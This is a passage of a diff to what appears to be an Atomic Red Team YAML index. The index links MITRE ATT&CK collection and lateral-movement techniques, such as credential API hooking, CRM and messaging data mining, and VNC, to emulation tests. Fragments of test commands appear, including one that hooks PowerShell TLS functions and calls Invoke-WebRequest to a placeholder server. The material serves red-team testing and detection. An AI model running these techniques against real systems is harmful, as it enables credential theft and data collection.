+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Logon Session: Logon Session Creation'
@@ -84087,9 +84640,6 @@ collection:
         external_id: T1114.002
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1114.002
     atomic_tests:
     - name: Office365 - Remote Mail Collected
@@ -84184,7 +84734,7 @@ collection:
         elevation_required: false
   T1056:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-08-13T17:33:45.244Z'
       name: Input Capture
       description: Adversaries may use methods of capturing user input to obtain credentials
         or collect information. During normal system usage, users often provide credentials
@@ -84200,6 +84750,7 @@ collection:
         phase_name: credential-access
       x_mitre_contributors:
       - John Lambert, Microsoft Threat Intelligence Center
+      x_mitre_deprecated: false
       x_mitre_detection: 'Detection may vary depending on how input is captured but
         may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`,
         `GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke),
@@ -84208,13 +84759,13 @@ collection:
         keylogging or API hooking are present.'
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
       - Network
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Process: Process Creation'
@@ -84222,15 +84773,11 @@ collection:
       - 'Process: Process Metadata'
       - 'Process: OS API Execution'
       - 'Driver: Driver Load'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      - root
-      - User
       type: attack-pattern
       id: attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2
       created: '2017-05-31T21:30:48.323Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1056
@@ -84241,9 +84788,60 @@ collection:
         url: http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1213.004:
+    technique:
+      modified: '2024-10-17T14:36:24.983Z'
+      name: Customer Relationship Management Software
+      description: |-
+        Adversaries may leverage Customer Relationship Management (CRM) software to mine valuable information. CRM software is used to assist organizations in tracking and managing customer interactions, as well as storing customer data.
+
+        Once adversaries gain access to a victim organization, they may mine CRM software for customer data. This may include personally identifiable information (PII) such as full names, emails, phone numbers, and addresses, as well as additional details such as purchase histories and IT support interactions. By collecting this data, an adversary may be able to send personalized [Phishing](https://attack.mitre.org/techniques/T1566) emails, engage in SIM swapping, or otherwise target the organization’s customers in ways that enable financial gain or the compromise of additional organizations.(Citation: Bleeping Computer US Cellular Hack 2022)(Citation: Bleeping Computer Mint Mobile Hack 2021)(Citation: Bleeping Computer Bank Hack 2020)
+
+        CRM software may be hosted on-premises or in the cloud. Information stored in these solutions may vary based on the specific instance or environment. Examples of CRM software include Microsoft Dynamics 365, Salesforce, Zoho, Zendesk, and HubSpot.
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      x_mitre_contributors:
+      - Centre for Cybersecurity Belgium (CCB)
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - SaaS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Logon Session: Logon Session Creation'
+      - 'Application Log: Application Log Content'
+      type: attack-pattern
+      id: attack-pattern--bbfbb096-6561-4d7d-aa2c-a5ee8e44c696
+      created: '2024-07-01T20:06:13.664Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1213/004
+        external_id: T1213.004
+      - source_name: Bleeping Computer Bank Hack 2020
+        description: Ionut Ilascu. (2020, January 16). Customer-Owned Bank Informs
+          100k of Breach Exposing Account Balance, PII. Retrieved July 1, 2024.
+        url: https://www.bleepingcomputer.com/news/security/customer-owned-bank-informs-100k-of-breach-exposing-account-balance-pii/
+      - source_name: Bleeping Computer Mint Mobile Hack 2021
+        description: Lawrence Abrams. (2021, July 10). Mint Mobile hit by a data breach
+          after numbers ported, data accessed. Retrieved July 1, 2024.
+        url: https://www.bleepingcomputer.com/news/security/mint-mobile-hit-by-a-data-breach-after-numbers-ported-data-accessed/
+      - source_name: Bleeping Computer US Cellular Hack 2022
+        description: Sergiu Gatlan. (2022, January 4). UScellular discloses data breach
+          after billing system hack. Retrieved July 1, 2024.
+        url: https://www.bleepingcomputer.com/news/security/uscellular-discloses-data-breach-after-billing-system-hack/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1557.002:
     technique:
@@ -84289,7 +84887,7 @@ collection:
         The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)
 
         Adversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-07-22T18:37:22.176Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: ARP Cache Poisoning
       x_mitre_detection: "Monitor network traffic for unusual ARP traffic, gratuitous
@@ -84308,37 +84906,36 @@ collection:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1213.003:
     technique:
-      modified: '2022-10-18T22:44:01.723Z'
+      modified: '2024-09-04T13:03:54.101Z'
       name: Code Repositories
       description: |-
         Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git.
 
-        Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or credentials contained within software's source code.  Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)
+        Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or [Unsecured Credentials](https://attack.mitre.org/techniques/T1552) contained within software's source code.  Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)
 
         **Note:** This is distinct from [Code Repositories](https://attack.mitre.org/techniques/T1593/003), which focuses on conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043) via public code repositories.
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_contributors:
+      - Itamar Mizrahi, Cymptom
+      - Toby Kohlenberg
+      - Josh Liburdi, @jshlbrd
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor access to code repositories, especially performed
         by privileged users such as Active Directory Domain or Enterprise Administrators
         as these types of accounts should generally not be used to access code repositories.
         In environments with high-maturity, it may be possible to leverage User-Behavioral
         Analytics (UBA) platforms to detect and alert on user-based anomalies.
-      x_mitre_platforms:
-      - SaaS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Itamar Mizrahi, Cymptom
-      - Toby Kohlenberg
-      - Josh Liburdi, @jshlbrd
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - SaaS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Logon Session: Logon Session Creation'
@@ -84361,41 +84958,52 @@ collection:
         url: https://krebsonsecurity.com/2013/10/adobe-to-announce-source-code-customer-data-breach/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1213:
     technique:
-      modified: '2024-03-01T16:27:47.391Z'
+      modified: '2024-10-28T19:10:16.960Z'
       name: Data from Information Repositories
       description: "Adversaries may leverage information repositories to mine valuable
         information. Information repositories are tools that allow for storage of
         information, typically to facilitate collaboration or information sharing
         between users, and can store a wide variety of data that may aid adversaries
-        in further objectives, or direct access to the target information. Adversaries
-        may also abuse external sharing features to share sensitive documents with
-        recipients outside of the organization. \n\nThe following is a brief list
-        of example information that may hold potential value to an adversary and may
-        also be found on an information repository:\n\n* Policies, procedures, and
-        standards\n* Physical / logical network diagrams\n* System architecture diagrams\n*
-        Technical system documentation\n* Testing / development credentials\n* Work
-        / project schedules\n* Source code snippets\n* Links to network shares and
-        other internal resources\n\nInformation stored in a repository may vary based
-        on the specific instance or environment. Specific common information repositories
-        include web-based platforms such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002)
-        and [Confluence](https://attack.mitre.org/techniques/T1213/001), specific
-        services such as Code Repositories, IaaS databases, enterprise databases,
-        and other storage infrastructure such as SQL Server."
+        in further objectives, such as Credential Access, Lateral Movement, or Defense
+        Evasion, or direct access to the target information. Adversaries may also
+        abuse external sharing features to share sensitive documents with recipients
+        outside of the organization (i.e., [Transfer Data to Cloud Account](https://attack.mitre.org/techniques/T1537)).
+        \n\nThe following is a brief list of example information that may hold potential
+        value to an adversary and may also be found on an information repository:\n\n*
+        Policies, procedures, and standards\n* Physical / logical network diagrams\n*
+        System architecture diagrams\n* Technical system documentation\n* Testing
+        / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
+        \n* Work / project schedules\n* Source code snippets\n* Links to network shares
+        and other internal resources\n* Contact or other sensitive information about
+        business partners and customers, including personally identifiable information
+        (PII) \n\nInformation stored in a repository may vary based on the specific
+        instance or environment. Specific common information repositories include
+        the following:\n\n* Storage services such as IaaS databases, enterprise databases,
+        and more specialized platforms such as customer relationship management (CRM)
+        databases \n* Collaboration platforms such as SharePoint, Confluence, and
+        code repositories\n* Messaging platforms such as Slack and Microsoft Teams
+        \n\nIn some cases, information repositories have been improperly secured,
+        typically by unintentionally allowing for overly-broad access by all users
+        or even public access to unauthenticated users. This is particularly common
+        with cloud-native or cloud-hosted services, such as AWS Relational Database
+        Service (RDS), Redis, or ElasticSearch.(Citation: Mitiga)(Citation: TrendMicro
+        Exposed Redis 2020)(Citation: Cybernews Reuters Leak 2022)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
       x_mitre_contributors:
-      - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
       - Regina Elwell
       - Praetorian
       - Milos Stojadinovic
       - Isif Ibrahima, Mandiant
+      - Obsidian Security
+      - Naveen Vijayaraghavan
+      - Nilesh Dherange (Gurucul)
       x_mitre_deprecated: false
       x_mitre_detection: "As information repositories generally have a considerably
         large user base, detection of malicious use can be non-trivial. At minimum,
@@ -84424,10 +85032,9 @@ collection:
       - Windows
       - macOS
       - SaaS
-      - Office 365
-      - Google Workspace
       - IaaS
-      x_mitre_version: '3.3'
+      - Office Suite
+      x_mitre_version: '3.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
@@ -84440,10 +85047,20 @@ collection:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1213
         external_id: T1213
+      - source_name: Mitiga
+        description: Ariel Szarf, Doron Karmi, and Lionel Saposnik. (n.d.). Oops,
+          I Leaked It Again — How Mitiga Found PII in Exposed Amazon RDS Snapshots.
+          Retrieved September 24, 2024.
+        url: https://www.mitiga.io/blog/how-mitiga-found-pii-in-exposed-amazon-rds-snapshots
       - source_name: Atlassian Confluence Logging
         description: Atlassian. (2018, January 9). How to Enable User Access Logging.
           Retrieved April 4, 2018.
         url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
+      - source_name: TrendMicro Exposed Redis 2020
+        description: David Fiser and Jaromir Horejsi. (2020, April 21). Exposed Redis
+          Instances Abused for Remote Code Execution, Cryptocurrency Mining. Retrieved
+          September 25, 2024.
+        url: https://www.trendmicro.com/en_us/research/20/d/exposed-redis-instances-abused-for-remote-code-execution-cryptocurrency-mining.html
       - source_name: Microsoft SharePoint Logging
         description: Microsoft. (2017, July 19). Configure audit settings for a site
           collection. Retrieved April 4, 2018.
@@ -84452,11 +85069,14 @@ collection:
         description: Microsoft. (n.d.). Sharepoint Sharing Events. Retrieved October
           8, 2021.
         url: https://docs.microsoft.com/en-us/microsoft-365/compliance/use-sharing-auditing?view=o365-worldwide#sharepoint-sharing-events
+      - source_name: Cybernews Reuters Leak 2022
+        description: Vilius Petkauskas . (2022, November 3). Thomson Reuters collected
+          and leaked at least 3TB of sensitive data. Retrieved September 25, 2024.
+        url: https://cybernews.com/security/thomson-reuters-leaked-terabytes-sensitive-data/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1602.001:
     technique:
@@ -84493,7 +85113,7 @@ collection:
         description: Cisco. (2008, June 10). Identifying and Mitigating Exploitation
           of the SNMP Version 3 Authentication Vulnerabilities. Retrieved October
           19, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T01:54:22.812Z'
       name: SNMP (MIB Dump)
       description: "Adversaries may target the Management Information Base (MIB) to
         collect and/or mine valuable information in a network managed using Simple
@@ -84525,80 +85145,10 @@ collection:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1056.004:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
-      type: attack-pattern
-      created: '2020-02-11T19:01:15.930Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1056.004
-        url: https://attack.mitre.org/techniques/T1056/004
-      - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
-        description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
-          Retrieved December 18, 2017.
-        url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
-      - url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
-        description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
-        source_name: Microsoft Hook Overview
-      - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
-        description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
-          A Technical Survey Of Common And Trending Process Injection Techniques.
-          Retrieved December 7, 2017.'
-        source_name: Elastic Process Injection July 2017
-      - url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
-        description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
-          Retrieved December 12, 2017.'
-        source_name: Adlice Software IAT Hooks Oct 2014
-      - url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
-        description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
-          Mode. Retrieved December 20, 2017.'
-        source_name: MWRInfoSecurity Dynamic Hooking 2015
-      - url: https://www.exploit-db.com/docs/17802.pdf
-        description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
-          December 12, 2017.
-        source_name: HighTech Bridge Inline Hooking Sept 2011
-      - url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
-        description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
-          Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
-        source_name: Volatility Detecting Hooks Sept 2012
-      - url: https://github.com/prekageo/winhook
-        description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
-        source_name: PreKageo Winhook Jul 2011
-      - url: https://github.com/jay/gethooks
-        description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
-          12, 2017.
-        source_name: Jay GetHooks Sept 2011
-      - url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
-        description: Felici, M. (2006, December 6). Any application-defined hook procedure
-          on my machine?. Retrieved December 12, 2017.
-        source_name: Zairon Hooking Dec 2006
-      - url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
-        description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
-          against user-land. Retrieved December 12, 2017.'
-        source_name: EyeofRa Detecting Hooking June 2017
-      - url: http://www.gmer.net/
-        description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
-        source_name: GMER Rootkits
-      - url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
-        description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
-          December 12, 2017.
-        source_name: Microsoft Process Snapshot
-      - url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
-        description: Stack Exchange - Security. (2012, July 31). What are the methods
-          to find hooked functions and APIs?. Retrieved December 12, 2017.
-        source_name: StackExchange Hooks Jul 2012
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-27T21:03:56.385Z'
       name: 'Input Capture: Credential API Hooking'
       description: |
         Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001),  this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
@@ -84611,23 +85161,89 @@ collection:
         phase_name: collection
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
 
         Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
 
         Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Process: Process Metadata'
       - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
+      created: '2020-02-11T19:01:15.930Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1056/004
+        external_id: T1056.004
+      - source_name: EyeofRa Detecting Hooking June 2017
+        description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
+          against user-land. Retrieved December 12, 2017.'
+        url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
+      - source_name: Zairon Hooking Dec 2006
+        description: Felici, M. (2006, December 6). Any application-defined hook procedure
+          on my machine?. Retrieved December 12, 2017.
+        url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
+      - source_name: GMER Rootkits
+        description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
+        url: http://www.gmer.net/
+      - source_name: MWRInfoSecurity Dynamic Hooking 2015
+        description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
+          Mode. Retrieved December 20, 2017.'
+        url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
+      - source_name: Elastic Process Injection July 2017
+        description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
+          A Technical Survey Of Common And Trending Process Injection Techniques.
+          Retrieved December 7, 2017.'
+        url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
+      - source_name: HighTech Bridge Inline Hooking Sept 2011
+        description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+          December 12, 2017.
+        url: https://www.exploit-db.com/docs/17802.pdf
+      - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
+        description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
+          Retrieved December 18, 2017.
+        url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
+      - source_name: Microsoft Hook Overview
+        description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
+        url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+      - source_name: Microsoft Process Snapshot
+        description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
+          December 12, 2017.
+        url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
+      - source_name: PreKageo Winhook Jul 2011
+        description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
+        url: https://github.com/prekageo/winhook
+      - source_name: Jay GetHooks Sept 2011
+        description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
+          12, 2017.
+        url: https://github.com/jay/gethooks
+      - source_name: StackExchange Hooks Jul 2012
+        description: Stack Exchange - Security. (2012, July 31). What are the methods
+          to find hooked functions and APIs?. Retrieved December 12, 2017.
+        url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+      - source_name: Adlice Software IAT Hooks Oct 2014
+        description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
+          Retrieved December 12, 2017.'
+        url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
+      - source_name: Volatility Detecting Hooks Sept 2012
+        description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
+          Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
+        url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1056.004
     atomic_tests:
     - name: Hook PowerShell TLS Encrypt/Decrypt Messages
@@ -84663,10 +85279,81 @@ collection:
           Invoke-WebRequest #{server_name} -UseBasicParsing
         name: powershell
         elevation_required: true
+  T1213.005:
+    technique:
+      modified: '2024-10-16T14:22:49.146Z'
+      name: Messaging Applications
+      description: "Adversaries may leverage chat and messaging applications, such
+        as Microsoft Teams, Google Chat, and Slack, to mine valuable information.
+        \ \n\nThe following is a brief list of example information that may hold potential
+        value to an adversary and may also be found on messaging applications: \n\n*
+        Testing / development credentials (i.e., [Chat Messages](https://attack.mitre.org/techniques/T1552/008))
+        \n* Source code snippets \n* Links to network shares and other internal resources
+        \n* Proprietary data(Citation: Guardian Grand Theft Auto Leak 2022)\n* Discussions
+        about ongoing incident response efforts(Citation: SC Magazine Ragnar Locker
+        2021)(Citation: Microsoft DEV-0537)\n\nIn addition to exfiltrating data from
+        messaging applications, adversaries may leverage data from chat messages in
+        order to improve their targeting - for example, by learning more about an
+        environment or evading ongoing incident response efforts.(Citation: Sentinel
+        Labs NullBulge 2024)(Citation: Permiso Scattered Spider 2023)"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      x_mitre_contributors:
+      - Menachem Goldstein
+      - Obsidian Security
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - SaaS
+      - Office Suite
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Application Log: Application Log Content'
+      type: attack-pattern
+      id: attack-pattern--fb75213f-cfb0-40bf-a02f-3bad93d6601e
+      created: '2024-08-30T13:50:42.023Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1213/005
+        external_id: T1213.005
+      - source_name: Sentinel Labs NullBulge 2024
+        description: " Jim Walter. (2024, July 16). NullBulge | Threat Actor Masquerades
+          as Hacktivist Group Rebelling Against AI. Retrieved August 30, 2024."
+        url: https://www.sentinelone.com/labs/nullbulge-threat-actor-masquerades-as-hacktivist-group-rebelling-against-ai/
+      - source_name: Permiso Scattered Spider 2023
+        description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+          SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+        url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
+      - source_name: SC Magazine Ragnar Locker 2021
+        description: Joe Uchill. (2021, December 3). Ragnar Locker reminds breach
+          victims it can read the on-network incident response chat rooms. Retrieved
+          August 30, 2024.
+        url: https://www.scmagazine.com/analysis/ragnar-locker-reminds-breach-victims-it-can-read-the-on-network-incident-response-chat-rooms
+      - source_name: Guardian Grand Theft Auto Leak 2022
+        description: 'Keza MacDonald, Keith Stuart and Alex Hern. (2022, September
+          19). Grand Theft Auto 6 leak: who hacked Rockstar and what was stolen?.
+          Retrieved August 30, 2024.'
+        url: https://www.theguardian.com/games/2022/sep/19/grand-theft-auto-6-leak-who-hacked-rockstar-and-what-was-stolen
+      - source_name: Microsoft DEV-0537
+        description: Microsoft. (2022, March 22). DEV-0537 criminal actor targeting
+          organizations for data exfiltration and destruction. Retrieved March 23,
+          2022.
+        url: https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
 lateral-movement:
   T1021.005:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:20:07.264Z'
       name: Remote Services:VNC
       description: |-
         Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC).  VNC is a platform-independent desktop sharing system that uses the RFB (“remote framebuffer”) protocol to enable users to remotely control another computer’s display by relaying the screen, mouse, and keyboard inputs over the network.(Citation: The Remote Framebuffer Protocol)
@@ -84677,6 +85364,7 @@ lateral-movement:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: lateral-movement
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Use of VNC may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior using VNC.
 
@@ -84686,7 +85374,6 @@ lateral-movement:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - macOS
@@ -84702,61 +85389,62 @@ lateral-movement:
       id: attack-pattern--01327cde-66c4-4123-bf34-5f258d59457b
